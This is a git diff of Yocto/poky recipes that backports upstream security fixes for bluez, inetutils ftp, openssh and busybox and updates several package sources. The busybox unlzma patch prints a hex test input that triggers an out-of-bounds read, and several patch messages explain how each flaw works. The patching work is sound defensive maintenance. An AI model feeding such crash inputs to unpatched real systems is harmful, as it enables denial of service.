"https://ftp.isc.org/isc/bind9/${PV}/${BPN}-${PV}.tar.gz \ file://0001-avoid-start-failure-with-bind-user.patch \ " -SRC_URI[sha256sum] = "cbf8cb4b74dd1452d97c3a2a8c625ea346df8516b4b3508ef07443121a591342" +SRC_URI[sha256sum] = "1c882705827b6aafa45d917ae3b20eccccc8d5df3c4477df44b04382e6c47562" UPSTREAM_CHECK_URI = "https://ftp.isc.org/isc/bind9/" # stay at 9.11 until 9.16, from 9.16 follow the ESV versions divisible by 4 diff --git a/poky/meta/recipes-connectivity/bluez5/bluez5.inc b/poky/meta/recipes-connectivity/bluez5/bluez5.inc index 202a14dee0..34796fdd20 100644 --- a/poky/meta/recipes-connectivity/bluez5/bluez5.inc +++ b/poky/meta/recipes-connectivity/bluez5/bluez5.inc @@ -52,6 +52,7 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/bluetooth/bluez-${PV}.tar.xz \ ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', '', 'file://0001-Allow-using-obexd-without-systemd-in-the-user-sessio.patch', d)} \ file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \ file://0001-test-gatt-Fix-hung-issue.patch \ + file://CVE-2021-0129.patch \ file://CVE-2021-3588.patch \ " S = "${WORKDIR}/bluez-${PV}" diff --git a/poky/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch b/poky/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch new file mode 100644 index 0000000000..b39730dc10 --- /dev/null +++ b/poky/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch @@ -0,0 +1,109 @@ +From 00da0fb4972cf59e1c075f313da81ea549cb8738 Mon Sep 17 00:00:00 2001 +From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com> +Date: Tue, 2 Mar 2021 11:38:33 -0800 +Subject: shared/gatt-server: Fix not properly checking for secure flags + +When passing the mask to check_permissions all valid permissions for +the operation must be set including BT_ATT_PERM_SECURE flags. + +Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/patch/?id=00da0fb4972cf59e1c075f313da81ea549cb8738] +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +CVE: CVE-2021-0129 +--- + src/shared/att-types.h | 8 ++++++++ + src/shared/gatt-server.c | 25 +++++++------------------ + 2 files changed, 15 insertions(+), 18 deletions(-) + +diff --git a/src/shared/att-types.h b/src/shared/att-types.h +index 7108b4e94..3adc05d9e 100644 +--- a/src/shared/att-types.h ++++ b/src/shared/att-types.h +@@ -129,6 +129,14 @@ struct bt_att_pdu_error_rsp { + #define BT_ATT_PERM_WRITE_SECURE 0x0200 + #define BT_ATT_PERM_SECURE (BT_ATT_PERM_READ_SECURE | \ + BT_ATT_PERM_WRITE_SECURE) ++#define BT_ATT_PERM_READ_MASK (BT_ATT_PERM_READ | \ ++ BT_ATT_PERM_READ_AUTHEN | \ ++ BT_ATT_PERM_READ_ENCRYPT | \ ++ BT_ATT_PERM_READ_SECURE) ++#define BT_ATT_PERM_WRITE_MASK (BT_ATT_PERM_WRITE | \ ++ BT_ATT_PERM_WRITE_AUTHEN | \ ++ BT_ATT_PERM_WRITE_ENCRYPT | \ ++ BT_ATT_PERM_WRITE_SECURE) + + /* GATT Characteristic Properties Bitfield values */ + #define BT_GATT_CHRC_PROP_BROADCAST 0x01 +diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c +index b5f7de7dc..970c35f94 100644 +--- a/src/shared/gatt-server.c ++++ b/src/shared/gatt-server.c +@@ -444,9 +444,7 @@ static void process_read_by_type(struct async_read_op *op) + return; + } + +- ecode = check_permissions(server, attr, BT_ATT_PERM_READ | +- BT_ATT_PERM_READ_AUTHEN | +- BT_ATT_PERM_READ_ENCRYPT); ++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK); + if (ecode) + goto error; + +@@ -811,9 +809,7 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu, + (opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd", + handle); + +- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE | +- BT_ATT_PERM_WRITE_AUTHEN | +- BT_ATT_PERM_WRITE_ENCRYPT); ++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK); + if (ecode) + goto error; + +@@ -913,9 +909,7 @@ static void handle_read_req(struct bt_att_chan *chan, + opcode == BT_ATT_OP_READ_BLOB_REQ ? "Blob " : "", + handle); + +- ecode = check_permissions(server, attr, BT_ATT_PERM_READ | +- BT_ATT_PERM_READ_AUTHEN | +- BT_ATT_PERM_READ_ENCRYPT); ++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK); + if (ecode) + goto error; + +@@ -1051,9 +1045,8 @@ static void read_multiple_complete_cb(struct gatt_db_attribute *attr, int err, + goto error; + } + +- ecode = check_permissions(data->server, next_attr, BT_ATT_PERM_READ | +- BT_ATT_PERM_READ_AUTHEN | +- BT_ATT_PERM_READ_ENCRYPT); ++ ecode = check_permissions(data->server, next_attr, ++ BT_ATT_PERM_READ_MASK); + if (ecode) + goto error; + +@@ -1129,9 +1122,7 @@ static void read_multiple_cb(struct bt_att_chan *chan, uint8_t opcode, + goto error; + } + +- ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ | +- BT_ATT_PERM_READ_AUTHEN | +- BT_ATT_PERM_READ_ENCRYPT); ++ ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ_MASK); + if (ecode) + goto error; + +@@ -1308,9 +1299,7 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode, + util_debug(server->debug_callback, server->debug_data, + "Prep Write Req - handle: 0x%04x", handle); + +- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE | +- BT_ATT_PERM_WRITE_AUTHEN | +- BT_ATT_PERM_WRITE_ENCRYPT); ++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK); + if (ecode) + goto error; + +-- +cgit 1.2.3-1.el7 + diff --git a/poky/meta/recipes-connectivity/connman/connman-gnome_0.7.bb b/poky/meta/recipes-connectivity/connman/connman-gnome_0.7.bb index 778bf50191..24593d6258 100644 --- a/poky/meta/recipes-connectivity/connman/connman-gnome_0.7.bb +++ b/poky/meta/recipes-connectivity/connman/connman-gnome_0.7.bb @@ -10,7 +10,7 @@ DEPENDS = "gtk+3 dbus-glib dbus-glib-native intltool-native gettext-native" # 0.7 tag SRCREV = "cf3c325b23dae843c5499a113591cfbc98acb143" -SRC_URI = "git://github.com/connectivity/connman-gnome.git \ +SRC_URI = "git://github.com/connectivity/connman-gnome.git;branch=master;protocol=https \ file://0001-Removed-icon-from-connman-gnome-about-applet.patch \ file://null_check_for_ipv4_config.patch \ file://images/* \ diff --git a/poky/meta/recipes-connectivity/connman/connman.inc b/poky/meta/recipes-connectivity/connman/connman.inc index 55e5bf97c7..c495ae29ad 100644 --- a/poky/meta/recipes-connectivity/connman/connman.inc +++ b/poky/meta/recipes-connectivity/connman/connman.inc @@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \ inherit autotools pkgconfig systemd update-rc.d update-alternatives +CVE_PRODUCT = "connman connection_manager" + DEPENDS = "dbus glib-2.0 ppp" INC_PR = "r20" diff --git a/poky/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch b/poky/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch new file mode 100644 index 0000000000..54252d6bc7 --- /dev/null +++ b/poky/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch @@ -0,0 +1,67 @@ +From 4e355804d57d5686defc363c70f81e6f58cd08f0 Mon Sep 17 00:00:00 2001 +From: Simon Josefsson <simon@josefsson.org> +Date: Fri, 17 Dec 2021 21:52:18 -0800 +Subject: [PATCH] ftp: check that PASV/LSPV addresses match. + +* NEWS: Mention change. +* ftp/ftp.c (initconn): Validate returned addresses. + +CVE: CVE-2021-40491 + +Upstream-Status: Backport +[https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=58cb043b190fd04effdaea7c9403416b436e50dd] + +Signed-off-by: Minjae Kim <flowergom@gmail.com> +--- + ftp/ftp.c | 21 +++++++++++++++++++++ + 1 file changed, 21 insertions(+) + +diff --git a/ftp/ftp.c b/ftp/ftp.c +index 9813586..7c72cb2 100644 +--- a/ftp/ftp.c ++++ b/ftp/ftp.c +@@ -1344,6 +1344,13 @@ initconn (void) + uint32_t *pu32 = (uint32_t *) &data_addr_sa4->sin_addr.s_addr; + pu32[0] = htonl ( (h[0] << 24) | (h[1] << 16) | (h[2] << 8) | h[3]); + } ++ if (data_addr_sa4->sin_addr.s_addr ++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr) ++ { ++ printf ("Passive mode address mismatch.\n"); ++ (void) command ("ABOR"); /* Cancel any open connection. */ ++ goto bad; ++ } + } /* LPSV IPv4 */ + else /* IPv6 */ + { +@@ -1374,6 +1381,13 @@ initconn (void) + pu32[2] = htonl ( (h[8] << 24) | (h[9] << 16) | (h[10] << 8) | h[11]); + pu32[3] = htonl ( (h[12] << 24) | (h[13] << 16) | (h[14] << 8) | h[15]); + } ++ if (data_addr_sa6->sin6_addr.s6_addr ++ != ((struct sockaddr_in6 *) &hisctladdr)->sin6_addr.s6_addr) ++ { ++ printf ("Passive mode address mismatch.\n"); ++ (void) command ("ABOR"); /* Cancel any open connection. */ ++ goto bad; ++ } + } /* LPSV IPv6 */ + } + else /* !EPSV && !LPSV */ +@@ -1394,6 +1408,13 @@ initconn (void) + | ((a2 & 0xff) << 8) | (a3 & 0xff) ); + data_addr_sa4->sin_port = + htons (((p0 & 0xff) << 8) | (p1 & 0xff)); ++ if (data_addr_sa4->sin_addr.s_addr ++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr) ++ { ++ printf ("Passive mode address mismatch.\n"); ++ (void) command ("ABOR"); /* Cancel any open connection. */ ++ goto bad; ++ } + } /* PASV */ + else + { +-- +2.25.1 + diff --git a/poky/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb b/poky/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb index cc9410b94e..f4450e19f4 100644 --- a/poky/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb +++ b/poky/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb @@ -23,6 +23,7 @@ SRC_URI = "${GNU_MIRROR}/inetutils/inetutils-${PV}.tar.gz \ file://inetutils-only-check-pam_appl.h-when-pam-enabled.patch \ file://0001-rcp-fix-to-work-with-large-files.patch \ file://fix-buffer-fortify-tfpt.patch \ + file://CVE-2021-40491.patch \ " SRC_URI[md5sum] = "04852c26c47cc8c6b825f2b74f191f52" diff --git a/poky/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb b/poky/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb index 9a83898e52..5213b28345 100644 --- a/poky/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb +++ b/poky/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1" DEPENDS = "avahi" -SRC_URI = "git://github.com/lathiat/nss-mdns \ +SRC_URI = "git://github.com/lathiat/nss-mdns;branch=master;protocol=https \ " SRCREV = "41c9c5e78f287ed4b41ac438c1873fa71bfa70ae" diff --git a/poky/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb b/poky/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb index f170cf4650..b4cbc1a76c 100644 --- a/poky/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb +++ b/poky/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb @@ -8,7 +8,7 @@ SRCREV = "90f3fe28aa25135b7e4a54a7816388913bfd4a2a" PV = "20201225" PE = "1" -SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https" +SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https;branch=master" S = "${WORKDIR}/git" inherit autotools diff --git a/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch b/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch new file mode 100644 index 0000000000..9fd7e932d1 --- /dev/null +++ b/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch @@ -0,0 +1,20 @@ +Description: fix double-free memory corruption in ssh-agent +Author: Marc Deslauriers <marc.deslauriers@canonical.com> +Origin: minimal fix for https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db + +Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com> + +CVE: CVE-2021-28041 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_8.2p1-4ubuntu0.3.debian.tar.xz] +Comment: No change in any hunk + +--- a/ssh-agent.c ++++ b/ssh-agent.c +@@ -496,6 +496,7 @@ process_add_identity(SocketEntry *e) + goto err; + } + free(ext_name); ++ ext_name = NULL; + break; + default: + error("%s: Unknown constraint %d", __func__, ctype); diff --git a/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch b/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch new file mode 100644 index 0000000000..bda896f581 --- /dev/null +++ b/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch @@ -0,0 +1,52 @@ +From a6414400ec94a17871081f7df24f910a6ee01b8b Mon Sep 17 00:00:00 2001 +From: Ali Abdallah <aabdallah@suse.de> +Date: Wed, 24 Nov 2021 13:33:39 +0100 +Subject: [PATCH] CVE-2021-41617 fix + +backport of the following two upstream commits + +f3cbe43e28fe71427d41cfe3a17125b972710455 +bf944e3794eff5413f2df1ef37cddf96918c6bde + +CVE-2021-41617 failed to correctly initialise supplemental groups +when executing an AuthorizedKeysCommand or AuthorizedPrincipalsCommand, +where a AuthorizedKeysCommandUser or AuthorizedPrincipalsCommandUser +directive has been set to run the command as a different user. Instead +these commands would inherit the groups that sshd(8) was started with. +--- + auth.c | 8 ++++++++ + 1 file changed, 8 insertions(+) + +CVE: CVE-2021-41617 +Upstream-Status: Backport [https://bugzilla.suse.com/attachment.cgi?id=854015] +Comment: No change in any hunk +Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com> + +diff --git a/auth.c b/auth.c +index 163038f..a47b267 100644 +--- a/auth.c ++++ b/auth.c +@@ -52,6 +52,7 @@ + #include <limits.h> + #include <netdb.h> + #include <time.h> ++#include <grp.h> + + #include "xmalloc.h" + #include "match.h" +@@ -851,6 +852,13 @@ subprocess(const char *tag, struct passwd *pw, const char *command, + } + closefrom(STDERR_FILENO + 1); + ++ if (geteuid() == 0 && ++ initgroups(pw->pw_name, pw->pw_gid) == -1) { ++ error("%s: initgroups(%s, %u): %s", tag, ++ pw->pw_name, (u_int)pw->pw_gid, strerror(errno)); ++ _exit(1); ++ } ++ + /* Don't use permanently_set_uid() here to avoid fatal() */ + if (setresgid(pw->pw_gid, pw->pw_gid, pw->pw_gid) == -1) { + error("%s: setresgid %u: %s", tag, (u_int)pw->pw_gid, +-- +2.26.2 diff --git a/poky/meta/recipes-connectivity/openssh/openssh_8.2p1.bb b/poky/meta/recipes-connectivity/openssh/openssh_8.2p1.bb index 64a0a72a8f..ddc9ed0b32 100644 --- a/poky/meta/recipes-connectivity/openssh/openssh_8.2p1.bb +++ b/poky/meta/recipes-connectivity/openssh/openssh_8.2p1.bb @@ -5,7 +5,7 @@ Ssh (Secure Shell) is a program for logging into a remote machine \ and for executing commands on a remote machine." HOMEPAGE = "http://www.openssh.com/" SECTION = "console/network" -LICENSE = "BSD & ISC & MIT" +LICENSE = "BSD-2-Clause & BSD-3-Clause & BSD-4-Clause & ISC & MIT" LIC_FILES_CHKSUM = "file://LICENCE;md5=18d9e5a8b3dd1790d73502f50426d4d3" DEPENDS = "zlib openssl virtual/crypt" @@ -25,6 +25,8 @@ SRC_URI = "http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-${PV}.tar file://sshd_check_keys \ file://add-test-support-for-busybox.patch \ file://CVE-2020-14145.patch \ + file://CVE-2021-28041.patch \ + file://CVE-2021-41617.patch \ " SRC_URI[md5sum] = "3076e6413e8dbe56d33848c1054ac091" SRC_URI[sha256sum] = "43925151e6cf6cee1450190c0e9af4dc36b41c12737619edff8bcebdff64e671" @@ -49,6 +51,15 @@ CVE_CHECK_WHITELIST += "CVE-2020-15778" # https://www.securityfocus.com/bid/30794 CVE_CHECK_WHITELIST += "CVE-2008-3844" +# openssh-ssh1 is provided for compatibility with old devices that +# cannot be upgraded to modern protocols. Thus they may not provide security +# support for this package because doing so would prevent access to equipment. +# The upstream OpenSSH developers see this as an important +# security feature and do not intend to 'fix' it. +# https://security-tracker.debian.org/tracker/CVE-2016-20012 +# https://ubuntu.com/security/CVE-2016-20012 +CVE_CHECK_WHITELIST += "CVE-2016-20012" + PAM_SRC_URI = "file://sshd" inherit manpages useradd update-rc.d update-alternatives systemd diff --git a/poky/meta/recipes-connectivity/openssl/openssl/reproducibility.patch b/poky/meta/recipes-connectivity/openssl/openssl/reproducibility.patch new file mode 100644 index 0000000000..8accbc9df2 --- /dev/null +++ b/poky/meta/recipes-connectivity/openssl/openssl/reproducibility.patch @@ -0,0 +1,22 @@ +Using localtime() means the output can depend on the timezone of the build machine. +Using gmtime() is safer. For complete reproducibility use SOURCE_DATE_EPOCH if set. + +Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> +Upstream-Status: Pending [should be suitable] + +Index: openssl-3.0.1/apps/progs.pl +=================================================================== +--- openssl-3.0.1.orig/apps/progs.pl ++++ openssl-3.0.1/apps/progs.pl +@@ -21,7 +21,10 @@ die "Unrecognised option, must be -C or + my %commands = (); + my $cmdre = qr/^\s*int\s+([a-z_][a-z0-9_]*)_main\(\s*int\s+argc\s*,/; + my $apps_openssl = shift @ARGV; +-my $YEAR = [localtime()]->[5] + 1900; ++my $YEAR = [gmtime()]->[5] + 1900; ++if (defined($ENV{SOURCE_DATE_EPOCH}) && $ENV{SOURCE_DATE_EPOCH} !~ /\D/) { ++ $YEAR = [gmtime($ENV{SOURCE_DATE_EPOCH})]->[5] + 1900; ++} + + # because the program apps/openssl has object files as sources, and + # they then have the corresponding C files as source, we need to chain diff --git a/poky/meta/recipes-connectivity/openssl/openssl_1.1.1k.bb b/poky/meta/recipes-connectivity/openssl/openssl_1.1.1l.bb index 5f281197c9..bf7cd6527e 100644 --- a/poky/meta/recipes-connectivity/openssl/openssl_1.1.1k.bb +++ b/poky/meta/recipes-connectivity/openssl/openssl_1.1.1l.bb @@ -17,13 +17,14 @@ SRC_URI = "http://www.openssl.org/source/openssl-${PV}.tar.gz \ file://0001-buildinfo-strip-sysroot-and-debug-prefix-map-from-co.patch \ file://afalg.patch \ file://reproducible.patch \ + file://reproducibility.patch \ " SRC_URI_append_class-nativesdk = " \ file://environment.d-openssl.sh \ " -SRC_URI[sha256sum] = "892a0875b9872acd04a9fde79b1f943075d5ea162415de3047c327df33fbaee5" +SRC_URI[sha256sum] = "0b7a3e5e59c34827fe0c3a74b7ec8baef302b98fa80088d7f9153aa16fa76bd1" inherit lib_package multilib_header multilib_script ptest MULTILIB_SCRIPTS = "${PN}-bin:${bindir}/c_rehash" diff --git a/poky/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb b/poky/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb index 67959576e8..f482bd297f 100644 --- a/poky/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb +++ b/poky/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb @@ -11,7 +11,7 @@ AUTHOR = "Thomas Hood" HOMEPAGE = "http://packages.debian.org/resolvconf" RDEPENDS_${PN} = "bash" -SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https \ +SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https;branch=master \ file://fix-path-for-busybox.patch \ file://99_resolvconf \ " diff --git a/poky/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch b/poky/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch new file mode 100644 index 0000000000..aef8a3db85 --- /dev/null +++ b/poky/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch @@ -0,0 +1,53 @@ +From 04f052c56ded5ab6a904e3a264a73dc0412b2e78 Mon Sep 17 00:00:00 2001 +From: Denys Vlasenko <vda.linux@googlemail.com> +Date: Tue, 15 Jun 2021 15:07:57 +0200 +Subject: [PATCH] unlzma: fix a case where we could read before beginning of + buffer +Cc: pavel@zhukoff.net + +Testcase: + + 21 01 01 00 00 00 00 00 e7 01 01 01 ef 00 df b6 + 00 17 02 10 11 0f ff 00 16 00 00 + +Unfortunately, the bug is not reliably causing a segfault, +the behavior depends on what's in memory before the buffer. + +function old new delta +unpack_lzma_stream 2762 2768 +6 + +Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com> + +Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com> + +CVE: CVE-2021-42374 +Upstream-Status: Backport [https://git.busybox.net/busybox/commit/?h=1_33_stable&id=d326be2850ea2bd78fe2c22d6c45c3b861d82937] +Comment: testdata dropped because of binary format + +--- + archival/libarchive/decompress_unlzma.c | 5 ++++- + testsuite/unlzma.tests | 17 +++++++++++++---- + testsuite/unlzma_issue_3.lzma | Bin 0 -> 27 bytes + 3 files changed, 17 insertions(+), 5 deletions(-) + create mode 100644 testsuite/unlzma_issue_3.lzma + +diff --git a/archival/libarchive/decompress_unlzma.c b/archival/libarchive/decompress_unlzma.c +index 0744f231a1d64d92676b0cada2342f88f3b39b31..fb5aac8fe9ea0c53e0c2d7a7cbd05a753e39bc9d 100644 +--- a/archival/libarchive/decompress_unlzma.c ++++ b/archival/libarchive/decompress_unlzma.c +@@ -290,8 +290,11 @@ unpack_lzma_stream(transformer_state_t *xstate) + uint32_t pos; + + pos = buffer_pos - rep0; +- if ((int32_t)pos < 0) ++ if ((int32_t)pos < 0) { + pos += header.dict_size; ++ if ((int32_t)pos < 0) ++ goto bad; ++ } + match_byte = buffer[pos]; + do { + int bit; +-- +2.34.0 + diff --git a/poky/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch b/poky/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch new file mode 100644 index 0000000000..c913eaee9c --- /dev/null +++ b/poky/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch @@ -0,0 +1,138 @@ +From 56a335378ac100d51c30b21eee499a2effa37fba Mon Sep 17 00:00:00 2001 +From: Denys Vlasenko <vda.linux@googlemail.com> +Date: Tue, 15 Jun 2021 16:05:57 +0200 +Subject: hush: fix handling of \^C and "^C" + +function old new delta +parse_stream 2238 2252 +14 +encode_string 243 256 +13 +------------------------------------------------------------------------------ +(add/remove: 0/0 grow/shrink: 2/0 up/down: 27/0) Total: 27 bytes + +Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com> +(cherry picked from commit 1b7a9b68d0e9aa19147d7fda16eb9a6b54156985) + +Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com> + +CVE: CVE-2021-42376 +Upstream-Status: Backport [https://git.busybox.net/busybox/patch/?id=56a335378ac100d51c30b21eee499a2effa37fba] +Comment: No changes in any hunk +--- + shell/ash_test/ash-misc/control_char3.right | 1 + + shell/ash_test/ash-misc/control_char3.tests | 2 ++ + shell/ash_test/ash-misc/control_char4.right | 1 + + shell/ash_test/ash-misc/control_char4.tests | 2 ++ + shell/hush.c | 11 +++++++++++ + shell/hush_test/hush-misc/control_char3.right | 1 + + shell/hush_test/hush-misc/control_char3.tests | 2 ++ + shell/hush_test/hush-misc/control_char4.right | 1 + + shell/hush_test/hush-misc/control_char4.tests | 2 ++ + 9 files changed, 23 insertions(+) + create mode 100644 shell/ash_test/ash-misc/control_char3.right + create mode 100755 shell/ash_test/ash-misc/control_char3.tests + create mode 100644 shell/ash_test/ash-misc/control_char4.right + create mode 100755 shell/ash_test/ash-misc/control_char4.tests + create mode 100644 shell/hush_test/hush-misc/control_char3.right + create mode 100755 shell/hush_test/hush-misc/control_char3.tests + create mode 100644 shell/hush_test/hush-misc/control_char4.right + create mode 100755 shell/hush_test/hush-misc/control_char4.tests + +diff --git a/shell/ash_test/ash-misc/control_char3.right b/shell/ash_test/ash-misc/control_char3.right +new file mode 100644 +index 000000000..283e02cbb +--- /dev/null ++++ b/shell/ash_test/ash-misc/control_char3.right +@@ -0,0 +1 @@ ++SHELL: line 1: : not found +diff --git a/shell/ash_test/ash-misc/control_char3.tests b/shell/ash_test/ash-misc/control_char3.tests +new file mode 100755 +index 000000000..4359db3f3 +--- /dev/null ++++ b/shell/ash_test/ash-misc/control_char3.tests +@@ -0,0 +1,2 @@ ++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages) ++$THIS_SH -c '\' SHELL +diff --git a/shell/ash_test/ash-misc/control_char4.right b/shell/ash_test/ash-misc/control_char4.right +new file mode 100644 +index 000000000..2bf18e684 +--- /dev/null ++++ b/shell/ash_test/ash-misc/control_char4.right +@@ -0,0 +1 @@ ++SHELL: line 1: -: not found +diff --git a/shell/ash_test/ash-misc/control_char4.tests b/shell/ash_test/ash-misc/control_char4.tests +new file mode 100755 +index 000000000..48010f154 +--- /dev/null ++++ b/shell/ash_test/ash-misc/control_char4.tests +@@ -0,0 +1,2 @@ ++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages) ++$THIS_SH -c '"-"' SHELL +diff --git a/shell/hush.c b/shell/hush.c +index 9fead37da..249728b9d 100644 +--- a/shell/hush.c ++++ b/shell/hush.c +@@ -5235,6 +5235,11 @@ static int encode_string(o_string *as_string, + } + #endif + o_addQchr(dest, ch); ++ if (ch == SPECIAL_VAR_SYMBOL) { ++ /* Convert "^C" to corresponding special variable reference */ ++ o_addchr(dest, SPECIAL_VAR_QUOTED_SVS); ++ o_addchr(dest, SPECIAL_VAR_SYMBOL); ++ } + goto again; + #undef as_string + } +@@ -5346,6 +5351,11 @@ static struct pipe *parse_stream(char **pstring, + if (ch == '\n') + continue; /* drop \<newline>, get next char */ + nommu_addchr(&ctx.as_string, '\\'); ++ if (ch == SPECIAL_VAR_SYMBOL) { ++ nommu_addchr(&ctx.as_string, ch); ++ /* Convert \^C to corresponding special variable reference */ ++ goto case_SPECIAL_VAR_SYMBOL; ++ } + o_addchr(&ctx.word, '\\'); + if (ch == EOF) { + /* Testcase: eval 'echo Ok\' */ +@@ -5670,6 +5680,7 @@ static struct pipe *parse_stream(char **pstring, + /* Note: nommu_addchr(&ctx.as_string, ch) is already done */ + + switch (ch) { ++ case_SPECIAL_VAR_SYMBOL: + case SPECIAL_VAR_SYMBOL: + /* Convert raw ^C to corresponding special variable reference */ + o_addchr(&ctx.word, SPECIAL_VAR_SYMBOL); +diff --git a/shell/hush_test/hush-misc/control_char3.right b/shell/hush_test/hush-misc/control_char3.right +new file mode 100644 +index 000000000..94b4f8699 +--- /dev/null ++++ b/shell/hush_test/hush-misc/control_char3.right +@@ -0,0 +1 @@ ++hush: can't execute '': No such file or directory +diff --git a/shell/hush_test/hush-misc/control_char3.tests b/shell/hush_test/hush-misc/control_char3.tests +new file mode 100755 +index 000000000..4359db3f3 +--- /dev/null ++++ b/shell/hush_test/hush-misc/control_char3.tests +@@ -0,0 +1,2 @@ ++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages) ++$THIS_SH -c '\' SHELL +diff --git a/shell/hush_test/hush-misc/control_char4.right b/shell/hush_test/hush-misc/control_char4.right +new file mode 100644 +index 000000000..698e21427 +--- /dev/null ++++ b/shell/hush_test/hush-misc/control_char4.right +@@ -0,0 +1 @@ ++hush: can't execute '-': No such file or directory +diff --git a/shell/hush_test/hush-misc/control_char4.tests b/shell/hush_test/hush-misc/control_char4.tests +new file mode 100755 +index 000000000..48010f154 +--- /dev/null ++++ b/shell/hush_test/hush-misc/control_char4.tests +@@ -0,0 +1,2 @@ ++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages) ++$THIS_SH -c '"-"' SHELL +-- +cgit v1.2.3 + diff --git a/poky/meta/recipes-core/busybox/busybox_1.31.1.bb b/poky/meta/recipes-core/busybox/busybox_1.31.1.bb index d9d5f4f96b..38b448b3e1 100644 --- a/poky/meta/recipes-core/busybox/busybox_1.31.1.bb +++ b/poky/meta/recipes-core/busybox/busybox_1.31.1.bb @@ -52,6 +52,9 @@ SRC_URI = "https://busybox.net/downloads/busybox-${PV}.tar.bz2;name=tarball \ file://0001-hwclock-make-glibc-2.31-compatible.patch \ file://0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch \ file://0001-mktemp-add-tmpdir-option.patch \ + file://CVE-2021-42374.patch \ + file://CVE-2021-42376.patch \ + file://CVE-2021-423xx-awk.patch \ " SRC_URI_append_libc-musl = " file://musl.cfg " diff --git a/poky/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch b/poky/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch new file mode 100644 index 0000000000..7e3d47b88c --- /dev/null +++ b/poky/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch @@ -0,0 +1,215 @@ +From a21708eb8d07b4a6dbc1d3e4ace4c5721515a84c Mon Sep 17 00:00:00 2001 +From: Sana Kazi <Sana.Kazi@kpit.com> +Date: Wed, 8 Dec 2021 12:25:34 +0530 +Subject: [PATCH] busybox: Fix multiple security issues 